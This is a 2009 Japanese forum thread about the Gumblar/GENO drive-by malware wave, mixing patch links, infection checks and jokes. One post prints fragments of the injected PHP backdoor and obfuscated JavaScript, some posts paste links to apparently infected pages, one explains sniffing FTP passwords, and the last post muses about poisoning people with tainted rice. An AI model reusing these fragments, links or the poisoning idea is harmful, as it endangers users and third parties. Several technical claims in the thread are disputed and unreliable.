277 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 23:17:31 ]: しかしAdobeは糞だなぁ
Adobe ReaderもCommon Filesのadobe_update.exeも
自動更新はオフにしてるのにそれでも外に出ようとする
行儀悪すぎ
278 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/12(火) 23:23:04 ]: 消せないファイルが残るしな
279 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 00:27:16 ]: 消せないファイルあったなー
どうやっても消せなくていろいろやったあとゴミ箱にドラックしたら普通に捨てれた
280 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 01:16:07 ]: そのファイル、今ごろゴミ箱の中で繁殖してるぞ
281 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 01:26:47 ]: windowsからじゃ消せなかった気がするが・・・
knoppixから消したんだけど、結局気持ち悪いからOSごと入れなおした
ゴミ箱ドラッグは試してなかったかも
282 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 02:38:17 ]: あの有名動画サイトSayMove!がGenoウイルスに感染、アクセスした乞食どもやばいぞ
tsushima.2ch.net/test/read.cgi/news/1242145955/
283 名前：名無しさん＠お腹いっぱい。 [2009/05/13(水) 03:19:56 ]: ｷﾀ━━━━(ﾟ∀ﾟ)━━━━!!!
284 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 03:29:19 ]: あの有名動画サイトSayMove!がGenoウイルスに感染、アクセスした乞食どもやばいぞ
tsushima.2ch.net/test/read.cgi/news/1242145955/

申し訳ありません。更新に使っていたPCが、
通称zlkon・GENOウイルスと呼ばれているウイルスの亜種に感染していたようです。
以下の時間帯に各ページにアクセスした方は感染の恐れが有ります。

5月12日　午前6時31分～午前8：00頃
・ニコニコのぞき見検索のトップページ・ランキングページ・再生ページ以外のHTMLページ
・SayMove！のトップページ
同日　午前6時31分～正午頃
・ニコニコのぞき見検索のマイリスト表示ページ

tokkablog.blog81.fc2.com/

say-move.net/
（現在は対処済み？）
285 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 03:54:09 ]: Adobe Reader 9.1.1
ttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1.1/misc/AdbeRdrUpd911_all_incr.msp
286 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 04:51:41 ]: sqlsodbc.chmってどうやってみつけるんだ？無いのだが･･･
287 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 05:05:25 ]: 感染しているか確認
どうやら感染するとC:\WINDOWS\system32\sqlsodbc.chmが上書きされる様子
これのハッシュ値を確認してみるといいかも
ファイルサイズが大きく違うのでよくわかんなかったらそっちでどうぞ
作成日時や更新日時は環境によってバラバラなのでとりあえず無視してもOK

正常なsqlsodbc.chm
ファイルサイズ：50,727バイト
CRC32：B61C7A80
MD5：F639AFDE02547603A3D3930EE4BF8C12
SHA-1：FBDD32ED13D27E4102621E1067FDF3634F33B2C3

上書きされたsqlsodbc.chmの例（あくまで例でありこの限りではない）
ファイルサイズ：1,323 バイト
CRC32：7585CBB6
MD5：BF7209B9589AD09A25740F6D47D0ADEA
SHA-1：D695F957AA9DEB0E4D92F4546DB3A883B1909008

とりあえずこれチェックして大丈夫なら安心だろ
288 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 06:00:22 ]: 僕達の感染はこれからだ！

GENO先生の次回作にご期待ください。
289 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 06:49:57 ]: げろの名が大きく広まった事件であった
その事件は未だ解決までに至っていない
290 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 06:55:06 ]: >>287
sqlsodbc.chmの正常な値はインストールされているSQL ServerやMSDEの
バージョンによって違うよ。
291 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 06:58:09 ]: >>287
なんの意味もないチェックだろこれ
292 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 07:29:10 ]: ttp://www.adobe.com/support/downloads/product.jsp?product=10&platform=Windows
Adobe Reader 9.1.1 Update - Multiple Languages 5/12/2009
Adobe Reader 8.1.5 Update - Multiple Languages 5/12/2009

これで安心？かな
293 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 07:42:48 ]: >>287
んなアホな。
294 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 07:54:33 ]: www.adobe.com/support/downloads/detail.jsp?ftpID=4447
Adobe Reader 7.1.2 Update - Multiple Languages 5/12/2009

今日仕事、一日中インストールしまくりだな
295 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 10:07:22 ]: SayMove!について語るスレ　part2
pc12.2ch.net/test/read.cgi/streaming/1241252349/
SayMove!について語るスレ　part3
pc12.2ch.net/test/read.cgi/streaming/1242174048/
ぱらすての次はsaymoveの時代だ！【本スレ】
pc12.2ch.net/test/read.cgi/streaming/1239969531/
296 名前：名無しさん＠お腹いっぱい。 [2009/05/13(水) 10:21:31 ]: ウィルス感染してるか調べる明確な方法はないのだろうか
297 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 11:07:49 ]: >>292
インストーラは9.1.0のままなので
[ヘルプ][アップデートの有無をチェック]で
9.1.1にしておくこと(とっくに9.1.0の人も)。
298 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 11:18:53 ]: >>292のとこアップデートのあるよ
299 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 11:33:27 ]: すまん、これのリンク先のこと
ttp://www.adobe.com/jp/support/security/bulletins/apsb09-04.html
300 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 12:15:34 ]: Adobe Reader 7/8/9すべて対策が講じられたということでいいのかな？
301 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 12:23:36 ]: んだね。もっともパッチ当てない奴が山ほどいそうだが。
302 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 12:25:29 ]: 進化したGENOウイルスがそれすらいずれ突破してきそうで怖いな
303 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 12:33:48 ]: クライアントPCへの侵入経路が今ひとつわからないんだよな。
クライアントPCに対してもWebに仕込まれるのと同様、Adobeの
脆弱性を突かれてるんだろうか。
304 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 13:04:10 ]: >>297
「アップデートサーバが応答していません。サーバが一時的にオフラインになっているか
インターネットまたはファイアウォール設定が正しくない場合があります。
後でもう一度やり直してください」

と出るんだがどうしたらいいの？
はぁ、もうこんな生活疲れたよ…
305 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 13:04:36 ]: >>294 からパチ拾う。
306 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 13:17:06 ]: >>299
だめだ、アクロバットリーダーの７のアップデートがあたんね
くそあどび
307 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 13:19:15 ]: 糞はお前だ・・・・。
308 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 13:49:14 ]: 全然おさまらないじゃん、GENOウイルス…
309 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 13:56:33 ]: 本番はこれからだ！GENOぉぉぉぉぉぉぉぉ！
310 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 14:40:31 ]: スイマセン
フラッシュは最新版で
偶然にもアドビリーダー入れてなかったんですが
感染して無いでしょうか
311 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 14:46:31 ]: 感染してますん
312 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 14:46:47 ]: 誰かエスパー呼んでこいよ。
313 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 14:50:04 ]: 好きだと言い出せないうちに　あなたのロッカー奪ったラブレター
314 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 15:51:18 ]: アンインストールするのが確実
315 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 16:26:52 ]: ウイルスのこと何も分からない俺に教えてください・・・
316 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 16:27:50 ]: GENOに感染して総再インスコしたんだけど
先にマカフィー入れてからアドビリーダーの最新版を入れようとしたら
バッファーのオーバーフローがどうのセキュリティ面に重大な問題がどうのと警告が出てインストール出来なかった
昨日発表されたパッチがあれば問題なくインストールできるのだろうか…
317 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 16:28:37 ]: >>315

￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣｣
―――――――――――――‐┬┘
　　　　　　　　　　　　　　　　　 |
　　　　＿＿＿＿.＿＿＿＿　　 |　.＿＿　
　　　　　|　　　　 | 　　　　|　　 |　|＼＿＼　　
　　　　　|　　　　 | ∧＿∧　|　　 |　|　 |.◎.｜　
　　　　　|　　　　 |（　´∀｀）つミ |　|　 |.：　｜
　　　　　|　　　　 |/ ⊃　ﾉ　|　　 |　.＼|.≡.｜
　　　　￣￣￣￣'￣￣￣￣　　 |　　
318 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 16:28:46 ]: >>315
ホムペ持ってないなら気にする必要なし。
319 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 16:29:01 ]: adobe readerは8と9どっちがいいの？
320 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 16:38:06 ]: >>316
こっちは、インストできたよ
こんなに大変な事態だとIPブロックをしないといけないなー
XPのファイアーウォールってIPブロックの機能ないんだろうか？
321 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 17:29:58 ]: sqlsodbc.chmがないんですが、これは異常なんですか？
OSはVistaです
322 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 17:31:43 ]: 窓の杜 - 【NEWS】Adobe、4月末に公表済みの深刻な脆弱性を修正した「Adobe Reader」v9.1.1を公開
www.forest.impress.co.jp/article/2009/05/13/adobereader911.html
323 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 17:36:53 ]: >>321
Vistaの場合はsqlsodbc.chmは
C:\Windows\Help\mui\0409
C:\Windows\Help\mui\0411
のどちらかにあると思うよ～
324 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 17:38:24 ]: >>318
>>5を見ればわかるけどサイト乗っ取りだけじゃなくゾンビ化するみたいだよ

このへんに出てる
www3.atword.jp/gnome/2009/05/09/oldschool-botnet-consists-new-malware-via-gumblar/
www3.atword.jp/gnome/2009/05/10/diagnostics-about-gumblars-trojan/
325 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 17:41:10 ]: >>319
迷う理由がわからないけど特に8を使う理由がなければ
9で良いと思うよ
326 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 17:48:09 ]: >>325
いや、特に8を使う理由はないんだけど、9は不具合が多いって
聞いたもんでｗ

ありがと
327 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 18:19:28 ]: >>324
ゾンビ化…
厄介な。
328 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 18:33:10 ]: >>323
ありがとうございます
329 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 18:35:42 ]: 9は開いた文書の数だけウィンドウが開いて、
タスクバーにボタンが作られるのが気に入らない
330 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 19:51:41 ]: >申し訳ありません。更新に使っていたPCが、
>通称zlkon・GENOウイルスと呼ばれているウイルスの亜種に感染していたようです。
>以下の時間帯に各ページにアクセスした方は感染の恐れが有ります。
>
>5月12日　午前6時31分～午前8：00頃
>・ニコニコのぞき見検索のトップページ・ランキングページ・再生ページ以外のHTMLページ
>・SayMove！のトップページ
>同日　午前6時31分～正午頃
>・ニコニコのぞき見検索のマイリスト表示ページ

の件だけど、Vid-DLとかを経由で動画落しても、感染するの？
331 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 19:55:07 ]: 94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
ってどうやるか判る人居ます？是非ご教授してほしいです
332 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 20:03:44 ]: 教示
333 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 20:06:11 ]: >>332
間違えました＞＜

94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
ってどうやるか判る人居ます？是非ご教示してほしいです
334 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 20:10:14 ]: まず服を脱ぎます
335 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 20:12:43 ]: >>303
不正なジャバスクリプトを仕込まれたページを閲覧する
ジャバスクリプト起動
アクロバットリーダー、もしくはフラッシュを起動
アクロバットのジャバスクリプト機能を起動
そこから侵入
336 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 20:38:31 ]: >>331
ルーターかPG2（ソフト）でブロックしろ。

PG2でのブロックの仕方はリネージュ資料室辺りでも漁ってくれ。説明は面倒だ。
Vistaの場合は、PG2(英文のβ)入れただけじゃ駄目で、ローダー経由で起動しないと
実際の動作しないことにも注意。
337 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 20:57:22 ]: うちは日本語化したPG2を常駐させてるなぁ
結構、役に立ってる
338 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 20:58:07 ]: >>336
よくわかんないけど･･･情報ありがとう！調べてみる
339 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 21:21:58 ]: もしこれ感染したの知らないままホームページ更新してたら
ソースにはなんて記述されてるの？
340 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 21:34:49 ]: >>339
参考

<?php
if(!function_exists('tmp_lkojfghx')){
if(isset($_POST['tmp_lkojfghx3']))
以下略

*.jsすべての後ろに、
<!-- document.write(unescape('0F%3COjAsJvcriOjApJvtJv
341 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 21:48:32 ]: 今回のもラトビアとばされんのか？
342 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 21:55:33 ]: >>340
ありがとう

とりあえずトレンドマイクロ　オンラインスキャン検出無し
sqlsodbc.chmハッシュ値確認正常
ホームページのソースに怪しい記述なし
pc再起動正常、cmdやregedit正常に起動

安心していいよな…
343 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 22:28:58 ]: GENOウイルスって感染するとDドライブとかにも影響出るんでしょうか？
再インストしてカスペルスキーのオンラインスキャンかけたらもう検出はされなかったんですが
申し訳ないのですがどなたか教えていただけないでしょうか
344 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 22:50:47 ]: >>343
データのバックアップができるぐらいだから
影響なかったはず
345 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 22:53:49 ]: >>344
レス本当にありがとうございます。安心しました
一回再インストールかけたらフォルダの合計は普通なのにＨＤのプロパティで調べたら
１００Ｇ以上あったりしてすごく焦りました…
もう一度かけたら直ったのですがウイルス系にかかったのは初めてだったんで
色々と過敏になってしまってました
346 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 23:02:47 ]: >>345
ウィルスのほうをバックアップしてなかったら、大丈夫
347 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 23:03:05 ]: Macは感染しないよね？
348 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 23:08:02 ]: Windows7は感染しないよね？
349 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 23:12:59 ]: Vistaなら感染しない
350 名前：345 mailto:sage [2009/05/13(水) 23:37:32 ]: >>346
あれ…不安になってきました
Ｄドライブを見て隠し含めてフォルダが無くカスペルスキーで
オンラインチェックして問題なかった場合はまず大丈夫と見て良い…でしょうか？
351 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/13(水) 23:50:52 ]: そろそろちゃんと報道されるかな？

628 シンフィアンドラ・ザンゼグラ(東日本) sage 2009/05/13(水) 23:48:57.86 ID:wuS3Hwtd(3)
小林製薬もGenoウィルスにやられてたのか。
シャレにならん事態だな。
www.kobayashi.co.jp/info/090512.html

クリーンインストールしない限り修復不能で、botnetに組み込まれてしまう
ような厄介な代物なのに、いつまで経ってもまともに報道されないのは
初期感染サイトが隠蔽したってのが大きいんだろうか。
352 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 00:28:15 ]: 国内の正規サイト改ざん：攻撃サイトを変え再襲来
www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884

　国内のWebサイトが次々に改ざんされ、閲覧者にウイルスを感染させようとする
悪質なJavaScriptが埋め込まれる問題が続いている。
　ラトビアに設置された攻撃サイトが4月末に閉鎖され、ひと安心と思ったのも束の
間、今度は「ｇｕｍｂｌａｒ．ｃｎ」というドメインにサイトを移して、攻撃を再開
したようだ。中国のドメイン名だが、サイトはロシアでホストされている。

■BIG-server.com
　ゼロ（札幌市厚別区）が運営するレンタルサーバーのBIG-server.com（中略）
■ウェルネス
　医療情報の提供やマーケッティングを行っているウェルネス（東京都文京区）（中略）
■ホースマンクラブ
　インターネットポイントサービスを行っている、へそクリック（横浜市西区）は7日、
　ホームページ上に掲載していた広告主で競馬情報の提供を行っているホースマンクラ
　ブのサイトが改ざんされ、不正なスクリプトが埋め込まれていたと発表。広告の掲載
　を中止（中略）

　攻撃サイトが変わり、最初にロードされるJavaScriptファイルまでが頻繁に更新
されている。ウイルス対策ソフトの対応が間に合わないようで、更新直後の検出率
は極めて低いという状態だ。（中略）
353 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 00:32:55 ]: ここいらで一旦、一般人がやっておくべき対策をまとめようか
354 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 00:33:26 ]: ロシアにいってサーバーを破壊すればいいんでは？
355 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 01:00:13 ]: どんな症状がでるの？感染すると？
356 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 01:01:45 ]: ロシアンマフィアの構成員になれて逮捕される
357 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 01:02:41 ]: 全身がもの凄くカユくなる
358 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 01:04:44 ]: 肩こりがなおる
359 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 01:08:19 ]: タミフルで治るって舛添が言ってた。
360 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 01:55:38 ]: 　　　　　　　　∧∧
　　　　　　ヽ(･ω･)/　　ｽﾞｺｰ
　　　　　＼(.＼ノ
　　　　､ﾊ,,､　￣
　　　　￣
361 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 06:44:32 ]: やっぱり有名どころが感染しないとダメなんだな　色んな意味で
362 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 07:09:21 ]: どうやってサイトを改ざんしているかってのに興味ない奴多すぎるし書いても無視されるし
いいよ無視しろよ難しいことからは目をそむけて生きろよ、おまえらは
理解できる奴だけ理解してればいいよ、もう

ftpはパスワードが暗号化されてない
snifferで盗撮すれば簡単に他人のパスワードを盗める
botnet、又は複数のノードを持ってたり複数のプロバイダと契約してたり
いろんな経路でsnifferできる環境にある奴、又は組織なら
いろんなサイトを改ざんできる
さらにいろんな人のメールを盗み見ることも出来る
どのサイトを見たのかという情報も簡単に手に入る
ネットが匿名なんていってる奴は情弱
全裸で外を歩いているようなものだよ
363 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 07:19:34 ]: avast先生が俺のPCを御助けくださった・・・
もう感謝するしかねえ
364 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 07:21:15 ]: AVAST今回は頑張った
365 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 07:22:46 ]: 豚インフル並にたいした事なかったなｗ
366 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 07:32:43 ]: >>365
GENO社員乙
367 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 08:48:46 ]: >>351
大手企業だから詳細な説明してくれるといいんだが。
368 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 09:14:28 ]: Adobe Readerをアンインストールしたよ。
代わりはPDF-XCHANGE VIEWER。
369 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 09:15:52 ]: GENOウイルス
370 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 10:17:55 ]: unescapeが含まれてたら警告出すとか、そういうのできないの？大体unescape含んでるんでしょ？
371 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 10:46:21 ]: maido3.com/server/zousan/index.htmlに変なjsが組み込まれてるけど、
so.7walker.net/index.php?site=http%3A%2F%2Fwww.maido3.com%2Fserver%2Fzousan%2F&hua=
これって感染してる？
372 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 10:53:03 ]: 直リンしちゃだめでしょ
373 名前：372 mailto:sage [2009/05/14(木) 10:53:45 ]: ごめんしてなかったか申し訳ない
374 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 11:02:10 ]: 商標と商号商標登録ホットライン
ttp://106hotline.com/guidance/kiso_syougou.html

↑
このページにアクセスすると、セキュリティソフト反応しますか？
私はavastを使っているんですが、「トロイ」の一種が検出されたんですが・・・

「JS:Redirector-H2」っていう名前なんですが、GENOウイルスの一種ですか？
375 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 11:04:37 ]: ウゼエな
376 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 11:05:01 ]: 小林製薬もやられた？
www.kobayashi.co.jp/info/090512.html
377 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 11:05:07 ]: 間違ってクリックしちゃうから工夫して書いて・・・
378 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 11:07:20 ]: >>376
>>351

http://とかごっそり削って書き込もうぜｗ
379 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 11:07:20 ]: 【小林製薬】一部Webサイトが第3者により改竄、ウイルススキャンのお願いとお詫び[05/12]
gimpo.2ch.net/test/read.cgi/owabiplus/1242212138/l50
380 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 11:08:16 ]: >>374
思いっきりgumblarの文字が！！
381 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 11:10:19 ]: >>380
gumblarって何ですか？
382 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 11:12:10 ]: Genoって難読化の方法もいくつかパターンがあるんだな。
383 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 11:12:59 ]: >>381
gumblarでこのスレを検索
384 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 11:14:33 ]: >>383
このスレの書き込みを見たんですが、要するに
「gumblar.cn」ってサイトに接続させるようなスクリプトが
このページに含まれていたってことなんでしょうか？
↓
商標と商号商標登録ホットライン
ttp://106hotline.com/guidance/kiso_syougou.html
385 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 11:16:35 ]: >>384
その通り。gumblar.cnからウィルス本体を送り込まれる。
386 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 11:18:48 ]: >>385
なるほど・・・
それで、avastで検出されたウイルス名が「Redirector」だったわけか・・・
つまり、「再接続させる」って意味でしょうね
387 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 11:22:12 ]: >>384
なんで>>377、>>378で言われてるのにまだそのままでリンク書いてるんだ？
わざとか？

ウイルスバスタースレでも悪用されてるぞ（本人か？）

pc11.2ch.net/test/read.cgi/sec/1242125567/355

355 名前：名無しさん＠お腹いっぱい。　[]　投稿日：2009/05/14(木) 11:11:51
商標と商号商標登録ホットライン
ttp://106hotline.com/guidance/kiso_syougou.html

↑
このページにアクセスすると、セキュリティソフト反応しますか？
私はavastを使っているんですが、「トロイ」の一種が検出されたんですが・・・
ウイルスバスターを使っている方はどうですか？
388 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 11:23:11 ]: ↑　ごめんそのまま貼っちゃった　リンク踏まないよう注意してください
389 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 11:23:50 ]: なにやってんだかｗｗｗ
390 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 11:24:21 ]: >>388
ちょｗ
自分で言っておいてｗ
何をやっているｗ
391 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 11:26:26 ]: 専ブラだとttpでもリンクになる場合が多いから危険すぎるな
392 名前：388 mailto:sage [2009/05/14(木) 11:27:41 ]: 申し訳ない　orz
393 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 11:30:23 ]: >>387-388
ﾜﾛﾀ
394 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 11:32:25 ]: ht tp://www.google.com/
こういう風に張ればいいんだよ
395 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 11:35:18 ]: http部分いじったって、GreaseMonkeyスクリプトや専ブラで直リンになるしどうだっていいよ
396 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 11:39:04 ]: >394
専ブラだとこれでも飛べちゃうんだよな
397 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 11:42:52 ]: >>396
そうなんだ。chaikaだと>>394はリンクされない。
398 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 11:44:16 ]: 他のブラウザは知らんがIEならアドレスバーにコピペすれば
自動的にHTTPの文字が追加されるので
ｗｗｗから書けば良い
399 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 11:45:18 ]: 途中の「test」を「てすと」に代えるとかしないと駄目だね
400 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 11:47:15 ]: hxxpでいいんじゃない？
401 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 11:49:33 ]: b2rだけど、こういうのってカーソルもってっただけでもヤバイ？
402 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 11:51:10 ]: www.example.com ←これをリンクにする専ブラもあるそうだ
ドットを●や■に変えるのをお勧め
403 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 11:51:46 ]: ttp://www.fourteenforty.jp/products/origma.htm
＞　近年、Webページを閲覧する事により感染する「Drive-by-Download」マルウエアの問題が深刻化しています。
＞Webブラウザやプラグイン、アプリケーションの脆弱性を利用してシステムにインストールされる事例が多発しており

GENOウイルスのことですね。よくわかりました。ｗ
404 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 11:54:39 ]: 384のはこのスレに貼られる前からあちこちのスレに貼られてるな
405 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 11:55:29 ]: ↑気づいたのは今だよ
406 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 11:57:05 ]: vista使いは丸腰でブラブラしてても良いのかね
407 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 12:34:23 ]: ＞＞406

よう俺
最近この話題知ったんだ

一応チェックはしておきたい
408 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 12:39:02 ]: 逆にこれはホームページを持ってるとわかりやすいってこと？
htmlアップロードすりゃ感染してるかどうかわかるよな？
409 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 12:42:05 ]: ラトビア特急、ゆっくりと路線縮小中

2009/04/09(木)　 7560 個
2009/04/17(金)　 8567 個
2009/04/19(日)　11795 個
2009/04/27(月)　15096 個
2009/04/30(木) 13456 個
2009/05/14(木) 12314 個のドメインを感染させています。

中々収束しないな orz
410 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 12:44:00 ]: 違う。
clientとserverの違いを考えろ。
お前はclientだろうが
411 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 12:46:01 ]: >>386
> つまり、「再接続させる」って意味でしょうね
> つまり、「再接続させる」って意味でしょうね
> つまり、「再接続させる」って意味でしょうね

「俺スルドイこと言った」とか思ってる？
412 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 12:47:04 ]: >>409
インフルの感染者を見ているようだ
413 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/14(木) 13:00:30 ]: 【ネット】小林製薬ウェブサイトの一部でサイト改ざん、現在は閉鎖　　閲覧者にはウイルス感染の恐れ [09/05/12]
anchorage.2ch.net/test/read.cgi/bizplus/1242271601/
414 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 13:34:38 ]: >>409
これは延べ数?
415 名前：名無しさん＠お腹いっぱい。 [2009/05/14(木) 13:41:38 ]: 汚染米とラジコン
gimpo.2ch.net/test/read.cgi/radiocontrol/1212811357/337-
gimpo.2ch.net/test/read.cgi/bouhan/1239734019/20-
カビ毒米って便利いいよね。
普通に食べて肝臓癌にして殺すことできるもんね。
気づかれずに何度も侵入、そのたびに米びつのお米をカビ毒米と交換、
